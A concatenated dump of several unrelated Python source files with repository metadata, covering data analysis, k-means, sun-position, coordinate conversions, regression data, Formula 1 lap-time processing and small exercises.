        # 20 unmatched outlier points appended to each set.
        noise_1, noise_2 = [], []
        for i in range(20):
            noise_1.append([
                random.randint(1, 300),
                random.randint(1, 300)
            ])
            noise_2.append([
                random.randint(1, 500),
                random.randint(1, 500)
            ])
        pts_np_1 = np.hstack((pts_np_1, np.array(noise_1).T))
        pts_np_2 = np.hstack((pts_np_2, np.array(noise_2).T))
        ratio_ransac = _ransac_find_scale(pts_set_1=pts_np_2.T, pts_set_2=pts_np_1.T, sigma=0.05, max_iter=100)
        print("\nNumber %i Iteration: \n- answer: %f\n- solution: %f"%(j+1, ratio_ransac, ratio))
        # Success = estimate within 5% of the true scale.
        if abs(ratio - ratio_ransac) < 0.05*ratio:
            times += 1
    print("Success Percentage: %f " %(times/n*100))
    # plt.scatter(pts_np_1[0,:], pts_np_1[1,:], c='red')
    # plt.scatter(pts_np_2[0,:], pts_np_2[1,:], c='blue')
# plt.show() | true |
11c8f0cd37f1418c4c955b7abfb168bb06138e35 | Python | szekany/autograder_visualization | /first_submit_vs_final_grade_boxplot.py | UTF-8 | 3,766 | 2.90625 | 3 | [] | no_license | # Quick visualization of students first submissions vs final date produced by autograder.io
#
# EXAMPLE USAGE: python first_submit_vs_final_grade_boxplot.py -f project_scores.csv
#
# (c)Steve Zekany EECS 370 Winter 2020
import csv
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import argparse
from util.datetime_z import parse_datetime
import datetime
import time
from textwrap import wrap
def make_histogram(filename, output_file, title):
    """Box-plot final autograder scores grouped by first-submission date.

    Reads the autograder.io CSV at `filename` (expects 'Username 1',
    'Timestamp' and 'Total' columns), takes each student's earliest
    submission date and maximum score, and saves a seaborn boxplot to
    `output_file`.
    """
    df = pd.read_csv(filename)
    # print(df) # uncomment to show dataframe

    # dictionarize the dataframe
    score_dict = pd.DataFrame.to_dict(df)

    # find all unique student names
    students = set(score_dict['Username 1'].values())
    print('number of student names: ' + str(len(students))) # debugging

    # get earliest date and max score for each student
    score_table = pd.DataFrame(columns=['First Submission', 'First Submission DatetimeObj', 'Last Submission', 'Final Score'])
    first_submission = df['Timestamp'].min()
    last_submission = df['Timestamp'].max()
    for student in students:
        subs = df.loc[df['Username 1'] == student]
        # print(subs['Timestamp'])
        # print(subs.qindex['Timestamp', 0])
        # print(subs['Timestamp'].min())
        first_submit_time = subs['Timestamp'].min()
        last_submit_time = subs['Timestamp'].max()
        max_score = subs['Total'].max()
        # print(type(first_submit_time))

        # build date
        first_date = parse_datetime(first_submit_time)
        # NOTE(review): last_date is parsed from first_submit_time, not
        # last_submit_time — looks like a copy/paste slip; confirm intent.
        last_date = parse_datetime(first_submit_time)
        # unixtime = time.mktime(date.timetuple())
        # first_date_str = str('%04d'%first_date.year) + '-' + str('%02d'%first_date.month) + '-' + str('%02d'%first_date.day)
        first_date_str = str('%02d'%first_date.month) + '-' + str('%02d'%first_date.day)
        last_date_str = str(last_date.year) + '-' + str(last_date.month) + '-' + str(last_date.day)

        # build the dataframe iteratively
        score_table.loc[student] = pd.Series({'First Submission':first_date_str, 'First Submission DatetimeObj':first_submit_time, 'Last Submission':pd.to_datetime(last_date_str), 'Final Score':max_score})

    # print(score_table)
    sns.set(style="whitegrid")

    # sorting dataframe (lexicographic on the 'MM-DD' strings)
    score_table.sort_values('First Submission', ascending=True, inplace=True)
    # print(score_table)
    # sns.regplot(x=score_table['First Submission DatetimeObj'], y=score_table['Final Score']);
    # ax = sns.scatterplot(x=score_table['First Submission'], y=score_table['Final Score'], color=sns.xkcd_rgb["windows blue"])
    ax = sns.boxplot(x=score_table['First Submission'], y=score_table['Final Score'])
    # ax.set_title(title)
    ax.set_title("\n".join(wrap(title, 60)))
    ax.set_ylabel("Final Score", fontweight="bold")
    ax.set_xlabel("Date of First Submission", fontweight="bold")
    ax.grid(False)
    # x_dates = score_table['First Submission'].dt.strftime('%Y-%m-%d').sort_values().unique()
    # ax.set_xticklabels(labels=x_dates, rotation=45, ha='right')
    # plt.xlim(first_submission, last_submission)
    ax.set_xticklabels(ax.get_xticklabels(), rotation=90)
    # ax.xaxis_date()
    # ax.xaxis.set_major_formatter(mdates.DateFormatter('%m-%d'))
    # fix layout
    plt.tight_layout()
    # plt.gcf().subplots_adjust(bottom=0.2)
    # plt.show()
    sns_plot = ax.get_figure()
    sns_plot.savefig(fname=output_file)
if __name__ == "__main__":
    #--- Setup Argument Parsing ---#
    # Usage: python first_submit_vs_final_grade_boxplot.py -f scores.csv
    parser = argparse.ArgumentParser(prog='histogram_all',
                                     description='Create a histogram of all final grades from the autograder.io csv')
    parser.add_argument("-f", "--filename", dest="filename",
                        required=True, help='path to csv file from autograder.io')
    args = parser.parse_args()

    # Output filename and chart title are fixed here.
    title = "Project 1a, Winter 2020 - Final score based on date of first submission to autograder.io"
    make_histogram(args.filename, 'output.png', title)
| true |
dcb824aac825b17d4ab2899ea875959ab58db04a | Python | JongbinWoo/Intro-to-ml | /summer/lab5/lab.py | UTF-8 | 1,653 | 3 | 3 | [] | no_license | import numpy as np
import random
import pandas as pd
import matplotlib.pyplot as plt
def distance(M, data):
    """Pairwise Euclidean distances between samples and centroids.

    Parameters
    ----------
    M : ndarray of shape (n_centroids, n_features)
    data : ndarray of shape (n_samples, n_features)

    Returns
    -------
    ndarray of shape (n_samples, n_centroids) where entry [i, j] is
    ||data[i] - M[j]||.

    Replaces the original double Python loop with a single broadcasted
    numpy expression; also generalises beyond 2-D points.
    """
    diff = data[:, None, :] - M[None, :, :]
    return np.linalg.norm(diff, axis=2)
def labeling(A):
    """Index of the nearest centroid (argmin over columns) per sample."""
    return A.argmin(axis=1)
def update(M, data, label):
    """Move each centroid to the mean of its assigned samples (in place).

    Parameters
    ----------
    M : ndarray of shape (n_centroids, n_features), modified in place.
    data : ndarray of shape (n_samples, n_features)
    label : array-like of centroid indices, one per sample.

    Returns M for convenience (same object).

    Improvements over the original: vectorised per-cluster mean (works
    for any number of features, not just 2), and empty clusters keep
    their previous position instead of raising ZeroDivisionError.
    """
    assignments = np.asarray(label)
    for k in range(M.shape[0]):
        members = data[assignments == k]
        if len(members):
            M[k] = members.mean(axis=0)
        # else: no points assigned — leave centroid k unchanged
    return M
# Load the 2-D sample points and plot the raw data.
data_name = "./data_kmeans.txt"
columns = ['x1', 'x2']
data = pd.read_csv(data_name, names=columns, sep=' ')
# NOTE(review): DataFrame.as_matrix() was removed in pandas 1.0; modern
# pandas needs .values or .to_numpy() here.
data = data.as_matrix()
plt.plot(data[:,0],data[:,1],'ro')
plt.xlabel('x_1')
plt.ylabel('x_2')
plt.show()
plt.xlabel('x_1')
plt.ylabel('x_2')
plt.plot(data[:,0],data[:,1],'ro')
plt.plot(data[:,0],data[:,1],'ro')
# NOTE(review): `label` and `M` are never assigned in this file — this
# looks like a notebook remnant that assumes a k-means loop ran earlier
# (producing centroids M and assignments label). Confirm before running.
plt.plot(data[label==0,0],data[label==0,1],'ro')
plt.plot(data[label==1,0],data[label==1,1],'bo')
plt.plot(data[label==2,0],data[label==2,1],'yo')
plt.plot(M[:,0], M[:,1], 'gx', label='Centroids')
# Classify three held-out test points against the fitted centroids.
test_data=np.array([[0.8, 1.2], [7., 5.],[1, 4]])
test_distance=distance(M, test_data)
test_label=labeling(test_distance)
plt.plot(test_data[test_label==0, 0], test_data[test_label==0, 1], "rx", label='Test')
plt.plot(test_data[test_label==1, 0], test_data[test_label==1, 1], "bx", label='Test')
plt.plot(test_data[test_label==2, 0], test_data[test_label==2, 1], "yx", label='Test')
plt.legend()
plt.show()
| true |
2833124bc799bf034406cdd21429278a68911ed2 | Python | danielvanpaass/Demonstrator | /Client/Angle.py | UTF-8 | 3,289 | 3.46875 | 3 | [
"MIT"
] | permissive | # Angle to sun calculation, azimuth TEST
import datetime
import math
import matplotlib.pyplot as plt
import numpy as np
# Year and hour-of-year used by the sun-position calculation below.
year = 2019
# hour = pd.date_range(start=year, end='2020', freq='1h')
hoy = 1
def calc_sun_position(self, latitude_deg, longitude_deg, year, hoy):
    """
    Calculates the Sun Position for a specific hour and location

    NOTE(review): `self` is unused — this is a module-level function that
    appears to have been copied out of a class; `longitude_rad` below is
    also computed but never used. Confirm before cleaning up.

    :param latitude_deg: Geographical Latitude in Degrees
    :type latitude_deg: float
    :param longitude_deg: Geographical Longitude in Degrees
    :type longitude_deg: float
    :param year: year
    :type year: int
    :param hoy: Hour of the year from the start. The first hour of January is 1
    :type hoy: int
    :return: altitude, azimuth: Sun position in altitude and azimuth degrees [degrees]
    :rtype: tuple
    """
    # Convert to Radians
    latitude_rad = math.radians(latitude_deg)
    longitude_rad = math.radians(longitude_deg)

    # Set the date in UTC based off the hour of year and the year itself
    start_of_year = datetime.datetime(year, 1, 1, 0, 0, 0, 0)
    utc_datetime = start_of_year + datetime.timedelta(hours=hoy)

    # Angular distance of the sun north or south of the earths equator
    # Determine the day of the year.
    day_of_year = utc_datetime.timetuple().tm_yday

    # Calculate the declination angle: The variation due to the earths tilt
    # http://www.pveducation.org/pvcdrom/properties-of-sunlight/declination-angle
    declination_rad = math.radians(
        23.45 * math.sin((2 * math.pi / 365.0) * (day_of_year - 81)))

    # Normalise the day to 2*pi
    # There is some reason as to why it is 364 and not 365.26
    angle_of_day = (day_of_year - 81) * (2 * math.pi / 364)

    # The deviation between local standard time and true solar time
    equation_of_time = (9.87 * math.sin(2 * angle_of_day)) - \
        (7.53 * math.cos(angle_of_day)) - (1.5 * math.sin(angle_of_day))

    # True Solar Time
    solar_time = ((utc_datetime.hour * 60) + utc_datetime.minute +
                  (4 * longitude_deg) + equation_of_time) / 60.0

    # Angle between the local longitude and longitude where the sun is at
    # higher altitude
    hour_angle_rad = math.radians(15 * (12 - solar_time))

    # Altitude Position of the Sun in Radians
    altitude_rad = math.asin(math.cos(latitude_rad) * math.cos(declination_rad) * math.cos(hour_angle_rad) +
                             math.sin(latitude_rad) * math.sin(declination_rad))

    # Azimuth Position of the sun in radians
    azimuth_rad = math.asin(
        math.cos(declination_rad) * math.sin(hour_angle_rad) / math.cos(altitude_rad))

    # Quadrant correction for the azimuth — imported from PySolar; the
    # original author noted they did not fully understand it.
    if (math.cos(hour_angle_rad) >= (math.tan(declination_rad) / math.tan(latitude_rad))):
        return math.degrees(altitude_rad), math.degrees(azimuth_rad)
    else:
        return math.degrees(altitude_rad), (180 - math.degrees(azimuth_rad))
# NOTE(review): this tail is broken leftover experimentation — the loop
# that would compute `alt`/`azi` is commented out, so the prints and the
# plot below raise NameError at runtime. Confirm intended usage.
self = np.arange(0,25)
latitude_deg = 52.0
longitude_deg = 4.3571
#for self in range(0,24): hoy = hoy + 1
# alt, azi = [calc_sun_position(self, 52.0, 4.3571, year, hoy)for self in range(0,24): hoy = hoy + 1]
print("Azimuth angle:", azi)
print("Altitude angle", alt)
plt.plot(hoy, azi)
plt.show()
| true |
14203fe5c1a2a51cc71f71664717e1e2f077dee0 | Python | ArthurVal/arthoolbox | /python/src/arthoolbox/localization/position.py | UTF-8 | 6,978 | 3.53125 | 4 | [
"MIT"
] | permissive | """Module use to define Position/Coordinate classes for Position handling
Classes list:
- Coordinate: Simple namespace use to store coordinates and conversions functions
- Position: Handle a postion (ie a coordinate and a frame_id)
"""
import copy, math, collections
from collections import namedtuple
class Coordinate(object):
    """Namespace grouping the supported coordinate tuples and the
    conversions between them.

    The three systems are plain namedtuples; `convert` dispatches
    through the `Conversion` table keyed on (from_type, to_type).
    """

    Cartesian = collections.namedtuple('Cartesian', ['x', 'y', 'z'])
    Cylindrical = collections.namedtuple('Cylindrical', ['r', 'theta', 'z'])
    Spherical = collections.namedtuple('Spherical', ['rho', 'theta', 'phi'])

    def __cart_to_sphe(coord):
        """Cartesian -> spherical (theta measured from the +z axis)."""
        rho = math.sqrt(math.fsum(map(math.pow, coord, (2, 2, 2))))
        return Coordinate.Spherical(
            rho=rho,
            theta=math.acos(coord.z / rho),
            phi=math.atan2(coord.y, coord.x),
        )

    def __cart_to_cyl(coord):
        """Cartesian -> cylindrical."""
        return Coordinate.Cylindrical(
            r=math.sqrt(math.pow(coord.x, 2) + math.pow(coord.y, 2)),
            theta=math.atan2(coord.y, coord.x),
            z=coord.z,
        )

    def __cyl_to_cart(coord):
        """Cylindrical -> Cartesian."""
        return Coordinate.Cartesian(
            x=coord.r * math.cos(coord.theta),
            y=coord.r * math.sin(coord.theta),
            z=coord.z,
        )

    def __cyl_to_sphe(coord):
        """Cylindrical -> spherical."""
        return Coordinate.Spherical(
            rho=math.sqrt(math.pow(coord.r, 2) + math.pow(coord.z, 2)),
            theta=math.atan(coord.r / coord.z),
            phi=coord.theta,
        )

    def __sphe_to_cart(coord):
        """Spherical -> Cartesian."""
        return Coordinate.Cartesian(
            x=coord.rho * math.sin(coord.theta) * math.cos(coord.phi),
            y=coord.rho * math.sin(coord.theta) * math.sin(coord.phi),
            z=coord.rho * math.cos(coord.theta),
        )

    def __sphe_to_cyl(coord):
        """Spherical -> cylindrical."""
        return Coordinate.Cylindrical(
            r=coord.rho * math.sin(coord.theta),
            theta=coord.phi,
            z=coord.rho * math.cos(coord.theta),
        )

    # Dispatch table: (source type, target type) -> converter.
    Conversion = {
        (Cartesian, Spherical): __cart_to_sphe,
        (Cartesian, Cylindrical): __cart_to_cyl,
        (Cylindrical, Cartesian): __cyl_to_cart,
        (Cylindrical, Spherical): __cyl_to_sphe,
        (Spherical, Cartesian): __sphe_to_cart,
        (Spherical, Cylindrical): __sphe_to_cyl,
    }

    Availables = frozenset((Cartesian, Cylindrical, Spherical))

    @staticmethod
    def convert(coordinate, to_type):
        """Convert `coordinate` to the coordinate system `to_type`.

        Parameters
        ----------
        coordinate: an instance of one of the Availables namedtuples
        to_type: one of the Availables namedtuple classes

        Raises
        ------
        AttributeError
            When either type is unknown or no conversion exists
            (including identity conversions, which are not in the table).
        """
        if type(coordinate) not in Coordinate.Availables:
            raise AttributeError(
                "Unknow coordinate system {}".format(type(coordinate))
            )

        if to_type not in Coordinate.Availables:
            raise AttributeError(
                "Unknow new coordinate system {}".format(to_type)
            )

        conversion_key = (type(coordinate), to_type)
        if conversion_key not in Coordinate.Conversion:
            raise AttributeError(
                "Unknow conversion from {} to {}".format(*conversion_key)
            )

        return Coordinate.Conversion[conversion_key](coordinate)
class Position(object):
    """A coordinate tagged with the frame of reference it lives in.

    TODO: frame_id conversion tree.

    Attributes
    ----------
    frame_id: str
        The frame ID this position is associated with.
    """

    # Immutable snapshot type used by __repr__.
    Repr = namedtuple('Position', ['frame_id', 'coordinate'])

    def __init__(self, initial_coordinates, frame_id=None):
        """Store the coordinate values, their tuple type and the frame.

        Parameters
        ----------
        initial_coordinates: one of the Coordinate namedtuples
        frame_id: str or None
            The frame this position is associated with.
        """
        self.__coordinates = [
            getattr(initial_coordinates, field, 0)
            for field in initial_coordinates._fields
        ]
        self.__coordinate_type = type(initial_coordinates)
        self.__frame_id = frame_id

    @property
    def frame_id(self):
        """Frame of reference this position is expressed in."""
        return self.__frame_id

    @property
    def type(self):
        """The coordinate namedtuple class used internally."""
        return self.__coordinate_type

    def get(self):
        """Return the current coordinates as an immutable namedtuple."""
        return self.__coordinate_type(*self.__coordinates[:3])

    def set(self, new_coordinate):
        """Replace the stored coordinates.

        Parameters
        ----------
        new_coordinate: Position or Coordinate namedtuple
            Converted to this object's coordinate system when needed.

        Raises
        ------
        AttributeError
            When `new_coordinate` cannot be converted to the stored
            coordinate system.
        """
        if isinstance(new_coordinate, Position):
            self.update_from_position(new_coordinate)
            return

        if type(new_coordinate) != self.__coordinate_type:
            new_coordinate = Coordinate.convert(
                new_coordinate,
                to_type=self.__coordinate_type
            )
        self.__coordinates = list(new_coordinate)

    def update_from_position(self, position, overwrite_frame_id=False):
        """Copy coordinates from another Position in the same frame.

        Parameters
        ----------
        position: Position
            Source of the new coordinates.
        overwrite_frame_id: bool
            When True, also adopt `position`'s frame_id first.
            NOTE: questionable — objects normally should not change
            their frame_id.
        """
        if overwrite_frame_id:
            self.__frame_id = copy.copy(position.frame_id)

        if position.frame_id != self.frame_id:
            # TODO: transform `position` into our frame_id instead.
            raise NotImplementedError(
                "Currently unable to update a Position from an other"
                " Position not within the same frame_id"
            )

        self.set(position.get())

    def __repr__(self):
        """Readable form: Position(frame_id=..., coordinate=...)."""
        return str(
            Position.Repr(
                frame_id=self.frame_id,
                coordinate=self.get(),
            )
        )
7bf5daa4c930b179431d83f8372d36f974cb0784 | Python | guillerova/SpainAI_2020_Series_Temporales | /general_utils.py | UTF-8 | 1,065 | 2.546875 | 3 | [] | no_license | import pandas as pd
def _fix_weights(weights):
suma_weights = sum(weights.values())
if suma_weights < 1.0:
# print(sum(weights.values()))
max_weight_asset = list(sorted(weights, key=weights.get, reverse=True))[0]
falta = 1 - suma_weights
weights[max_weight_asset] += falta
# print(sum(weights.values()))
assert sum(weights.values()) == 1.0
return weights
elif suma_weights > 1.0:
max_weight_asset = list(sorted(weights, key=weights.get, reverse=True))[0]
sobra = suma_weights - 1
weights[max_weight_asset] -= sobra
assert sum(weights.values()) == 1.0
assert all([v > 0 for v in weights.values()])
return weights
def get_submission_markowitz(weights, assets):
    """Build a submission DataFrame with one constant allocation column
    per asset.

    `weights` maps '<asset>_close' keys to allocations (normalised via
    _fix_weights); `assets` lists the asset names. The timestamp column
    is copied from the submission template CSV on disk.
    """
    weights = _fix_weights(weights)
    subm_plantilla = pd.read_csv("./submission/submission.csv")
    date = subm_plantilla["eod_ts"]
    # Repeat each asset's weight for every timestamp row.
    cols = {
        f"allo_{asset}": [weights[f"{asset}_close"]] * len(date) for asset in assets
    }
    return pd.DataFrame({"eod_ts": date, **cols})
| true |
4bd59367690b852f9bf9fa4138bf020b9c59157d | Python | r39ashmi/LastMileRoutingResearchChallenge | /src/utils/models/adjacency_encoder.py | UTF-8 | 1,532 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 28 09:43:48 2021
@author: Rashmi Kethireddy
"""
import numpy as np
import torch.nn as nn
from torch.nn import functional as F
import torch
torch.manual_seed(400)
class SpectralRule(nn.Module):
    """GCN-style spectral propagation layer: symmetric normalisation of
    the adjacency with self-loops, aggregation, then Linear + ReLU."""

    def __init__(self, in_units, out_units, **kwargs):
        # in_units/out_units size the single linear projection.
        super().__init__(**kwargs)
        self.in_units, self.out_units = in_units, out_units
        self.lin1=nn.Linear(self.in_units, self.out_units)

    def forward(self,A, X):
        # Add self-loops: A_hat = A + I.
        I = torch.eye(*A.shape[1:2])
        A_hat = A + I
        # Degree vector and D^{-1/2} as a diagonal matrix.
        D = torch.sum(A_hat, axis=0)
        D_inv = D**-0.5
        D_inv = torch.diag(D_inv)
        # NOTE(review): `*` is element-wise here, which zeroes every
        # off-diagonal entry of A_hat; the spectral rule normally uses
        # matrix products (D_inv @ A_hat @ D_inv) — confirm intent.
        # torch.tensor() on an existing tensor also copies and warns.
        A_hat = torch.tensor(D_inv * A_hat * D_inv,dtype=torch.float32)
        # NOTE(review): X.t() assumes features arrive transposed; with
        # the (4, 2) X used in main() this matmul shape-mismatches —
        # verify the expected input orientation.
        aggregate =torch.matmul(A_hat,X.t())
        propagate = F.relu(self.lin1(aggregate))
        return propagate
'''
def temp(A,X):
I = torch.eye(*A.shape)
A_hat = A.copy() + I
A=A_hat * X
D = np.array(np.sum(A, axis=0))[0]
D = np.matrix(np.diag(D))
D**-1 * A
'''
def main():
    """Smoke-test SpectralRule on a tiny 4-node directed graph."""
    #Intialize dummy A
    #Run the code for testing
    A=torch.tensor(np.matrix([
        [0, 1, 0, 0],
        [0, 0, 1, 1],
        [0, 1, 0, 0],
        [1, 0, 1, 0]],
        dtype=float
    ))
    # Two features per node.
    X=torch.tensor([
        [ 0., 0.],
        [ 1., -1.],
        [ 2., -2.],
        [ 3., -3.]
    ])
    sr_model=SpectralRule(4,2)
    pr=sr_model(A,X)
    print(pr)

if __name__=='__main__':
    main()
| true |
763ab48775b53a33fc2e1c0e88d44ae49cc751e4 | Python | jakelevi1996/backprop2 | /data/guassian_curve.py | UTF-8 | 3,033 | 2.90625 | 3 | [] | no_license | import numpy as np
from data.regression import Regression
def _noisy_gaussian(
x,
input_offset,
input_scale,
output_offset,
output_scale,
noise_std,
output_dim,
):
x_affine_transformed = np.dot(input_scale, x - input_offset)
y_pre_affine_transformation = (
np.exp(-np.square(x_affine_transformed).sum(axis=0))
)
noisy_offset = np.random.normal(
loc=output_offset,
scale=noise_std,
size=[output_dim, x.shape[1]],
)
y = (y_pre_affine_transformation * output_scale) + noisy_offset
return y
class GaussianCurve(Regression):
    def __init__(
        self,
        input_dim=1,
        output_dim=1,
        n_train=None,
        n_test=None,
        x_lo=-2,
        x_hi=2,
        noise_std=0.1,
        input_offset=None,
        input_scale=None,
        output_offset=None,
        output_scale=None,
        x_train=None,
        x_test=None,
    ):
        """ Initialise a GaussianCurve object.

        Any affine parameter left as None is drawn at random; x_train /
        x_test default to uniform samples in [x_lo, x_hi]. Targets are
        produced by _noisy_gaussian.

        NOTE(review): self.train / self.test containers are assumed to
        be set up by Regression.__init__ and set_shape_constants (base
        class not visible here) — confirm.
        """
        Regression.__init__(self)
        # Set shape constants and unspecified parameters
        self.set_shape_constants(input_dim, output_dim, n_train, n_test)
        if input_offset is None:
            input_offset = np.random.normal(size=[input_dim, 1])
        if input_scale is None:
            input_scale = np.random.normal(size=[input_dim, input_dim])
        if output_offset is None:
            output_offset = np.random.normal(size=[output_dim, 1])
        if output_scale is None:
            output_scale = np.random.normal(scale=5, size=[output_dim, 1])
        # Generate input/output training and test data
        if x_train is None:
            self.train.x = np.random.uniform(
                x_lo,
                x_hi,
                size=[input_dim, self.train.n],
            )
        else:
            self.train.x = x_train
        if x_test is None:
            self.test.x = np.random.uniform(
                x_lo,
                x_hi,
                size=[input_dim, self.test.n],
            )
        else:
            self.test.x = x_test
        self.train.y = _noisy_gaussian(
            self.train.x,
            input_offset,
            input_scale,
            output_offset,
            output_scale,
            noise_std,
            output_dim,
        )
        self.test.y = _noisy_gaussian(
            self.test.x,
            input_offset,
            input_scale,
            output_offset,
            output_scale,
            noise_std,
            output_dim,
        )
class SumOfGaussianCurves(Regression):
    def __init__(self, *args, n_components=4, **kwargs):
        # A dataset whose targets are the sum of n_components random
        # Gaussian bumps evaluated at shared inputs. x_train/x_test must
        # not be supplied: the first component samples them and the rest
        # reuse them so the component curves align.
        assert ("x_train" not in kwargs) and ("x_test" not in kwargs)
        # Deliberately initialises self via GaussianCurve.__init__ to
        # produce the first component in place.
        GaussianCurve.__init__(self, *args, **kwargs)
        for _ in range(n_components - 1):
            g = GaussianCurve(
                *args,
                **kwargs,
                x_train=self.train.x,
                x_test=self.test.x,
            )
            self.train.y += g.train.y
            self.test.y += g.test.y
| true |
554d92888f7c3c0bf55c3e76586b69749128a5f6 | Python | darklatiz/MathematicsForML | /intro/coursera/test/week2_assesment.py | UTF-8 | 1,290 | 3.96875 | 4 | [] | no_license | from intro.coursera.vectors import Vector
'''
A ship travels with velocity given by [1,2], with current flowing
in the direction given by [1,1] with respect to some co-ordinate axes.
What is the velocity of the ship in the direction of the current?
A. The projection of the velocity into the current vector
'''
# NOTE(review): Vector is a project class; scalar_projection /
# vector_projection / basis_change semantics assumed from the course
# material — confirm against intro.coursera.vectors.
r = Vector([1,2])
s = Vector([1,1])
print("Projection of s onto r = {0}".format(s.scalar_projection(r)))
print("The Vector Projection of s onto r = {0}".format(s.vector_projection(r)))
'''
A ball travels with velocity given by [2,1],
with wind blowing in the direction given by [3,−4] with respect to some co-ordinate axes.
What is the size of the velocity of the ball in the direction of the wind?
'''
# NOTE(review): the message below still says "s onto r" although the
# operands are the ball/wind vectors — misleading but left unchanged.
ballVector = Vector([2,1])
windDirection = Vector([3,-4])
print("Projection of s onto r = {0}".format(ballVector.scalar_projection(windDirection)))
'''
Given vectors v=[−4,−3,8], b1=[1,2,3], b2=[−2,1,0] and b3=−3,−6,5] all written in the standard basis,
what is v in the basis defined by b1, b2 and b3?
You are given that b1, b2 and b3 are all pairwise orthogonal to each other.
'''
b1 = Vector([1,2,3])
b2 = Vector([-2,1,0])
b3 = Vector([-3,-6,5])
r = Vector([-4,-3,8])
nev = r.basis_change(b1, b2, b3)
print("Change Basis exercise: {0}".format(nev))
| true |
d7d9169220b404d81242691085c1cc05766c6c45 | Python | lgt494371725/leetcode | /十进制转二进制.py | UTF-8 | 210 | 3.375 | 3 | [] | no_license |
# Retained for backward compatibility; no longer used internally.
temp = []


def binary(decimal):
    """Return the binary representation of a non-negative int as a string.

    Fixes in this version: 0 now yields '0' (the original returned the
    empty string), negative input raises ValueError (the original looped
    forever on it), and the shared module-level `temp` list is no longer
    used as scratch state.
    """
    if decimal < 0:
        raise ValueError("negative values are not supported")
    bits = []
    while decimal:
        bits.append(str(decimal % 2))
        decimal //= 2
    return ''.join(reversed(bits)) or '0'


print(binary(10))
| true |
917684c32c255524405ac5dc09e64c5f6a578790 | Python | carolsgit/python | /抓取网页字符串.py | UTF-8 | 458 | 3.15625 | 3 | [] | no_license | import urllib.request
def lookinfo():
    """Fetch the page and return the 12-character snippet starting at
    '海南' (Hainan).

    Fixes: the original printed the snippet inside the function and
    returned None, so the caller's print() displayed 'None'; it now
    returns the snippet. The HTTP response is also closed via a context
    manager instead of being leaked.

    NOTE(review): if '海南' is not found, find() returns -1 and the slice
    is meaningless — confirm whether that case needs handling.
    """
    with urllib.request.urlopen("http://www.lookinfo.com.cn/do/alonepage.php?id=2") as page:
        # The site serves GB2312-encoded Chinese text.
        text = page.read().decode("gb2312")
    start = text.find("海南")
    end = start + 12
    return text[start:end]


print(lookinfo())
| true |
114e3222c546687ea1c5e3eeae9ebda3e59656aa | Python | paulRarity/python1 | /strings.py | UTF-8 | 270 | 3.140625 | 3 | [] | no_license | course = "python for beginner"
# Beginner string exercises; `course` is assigned just above.
print(course[3])              # 4th character: 'h'
course = "python for beginner"
print(course[:])              # full copy of the string
study = "ky su"
print(len(study))
print(course.replace("p","Q"))
# Replacing the whole string with `study` just prints "ky su".
print(course.replace(course,study))
print(course.upper())
print(course.find("p"))       # index of first 'p'
print("python" in course) | true |
ab815f5b89156be9459819dfb0aeef8c7bfd1741 | Python | SheldonGrant/f1-tires | /scripts/f1_scripts.py | UTF-8 | 6,898 | 2.640625 | 3 | [] | no_license | import pandas as pd
import numpy as np
import datetime
import os
from collections import defaultdict
def assign_lap(df):
    """Assign a cumulative lap number per driver.

    `df` is a header-less frame whose columns are [driver NO, GAP,
    TIME]; a LAP column is appended and turned into a running count per
    driver. Returns a new DataFrame with columns NO/GAP/TIME/LAP.
    """
    df['LAP'] = 1
    labels = ['NO', 'GAP', 'TIME', 'LAP']
    values = df.values
    for driver in df[0].unique():
        rows = values[:, 0] == driver
        values[rows, 3] = values[rows, 3].cumsum()
    return pd.DataFrame(data=values, columns=labels)
def convert_time(arr):
    """Convert a Series of 'M:SS.f' lap-time strings to seconds (float)."""
    epoch = datetime.datetime.strptime('00:00.0', '%M:%S.%f')
    parsed = arr.apply(lambda raw: datetime.datetime.strptime(raw.strip(), '%M:%S.%f'))
    elapsed = parsed - epoch
    return elapsed.apply(lambda delta: delta / np.timedelta64(1, 's'))
def get_tires(df):
    """Expand 'COMPOUND (laps)' stint cells into one tire entry per lap.

    Each input row is [driver NAME, stint1, stint2, ...]; the output row
    is [NAME, tire_for_lap_1, tire_for_lap_2, ...], with columns named
    'NAME', 1, 2, ... (short strategies padded with None by pandas).

    Fixes: replaced Python-2-only xrange (NameError on Python 3) and the
    bare `except` with a targeted one — NaN cells raise AttributeError
    on .split() and malformed cells raise ValueError, exactly the cases
    the original silently skipped.
    """
    all_strategies = []
    for row in df.values:
        strategy = [row[0]]
        for item in row[1:]:
            try:
                tire, laps = item.split()
                laps = int(laps.replace('(', '').replace(')', ''))
            except (AttributeError, ValueError):
                continue  # NaN or malformed stint cell — skip, as before
            strategy.extend([tire] * laps)
        all_strategies.append(strategy)
    out = pd.DataFrame(data=all_strategies)
    out.columns = ['NAME'] + list(range(1, out.shape[1]))
    return out
def get_sector_times(df):
    """Reassemble per-sector timing rows into one row per driver.

    The raw sheet stacks sector 1, sector 2 and sector 3 tables
    vertically; columns 0/1 are driver number and name.

    NOTE(review): `df.shape[0] / 3` is a float on Python 3, which makes
    the iloc slicing below raise — this code is Python-2 era (use //).
    The hard-coded 22 (sector-1 row count) versus `rows` for the other
    sectors also looks sheet-specific — confirm.
    """
    rows = df.shape[0] / 3
    sector1, others = df.iloc[:22, :], df.iloc[22:, :]
    sector2, sector3 = others.iloc[:rows, :], others.iloc[rows:, :]
    all_sectors = pd.merge(sector2, sector3, on=[0, 1])
    all_sectors = pd.merge(sector1, all_sectors, on=[0,1])
    all_sectors.columns = ['NO', 'DRIVER', 'SECTOR_1', 'SECTOR_2', 'SECTOR_3']
    # First row is the header row from the raw sheet.
    all_sectors.drop(0, inplace=True)
    all_sectors[['SECTOR_1', 'SECTOR_2', 'SECTOR_3']] = all_sectors[['SECTOR_1', 'SECTOR_2', 'SECTOR_3']].astype(float)
    return all_sectors
def get_avg_lap(df):
    """Lap count and mean lap time per (driver, tire, track, year).

    `df` needs columns NO/GAP/LAP/RACE/TIRE/TRACK/YEAR/TIME; GAP, LAP
    and RACE are dropped before grouping.

    Fixed a bug in the original: it ignored its `df` argument and read
    the module-level global `lap_times` instead.
    """
    grouped = df.drop(['GAP', 'LAP', 'RACE'], axis=1).groupby(['NO', 'TIRE', 'TRACK', 'YEAR'], as_index=False)
    avg_laps = pd.merge(grouped.count(), grouped.mean(), how='left', on=['NO', 'TIRE', 'TRACK', 'YEAR'])
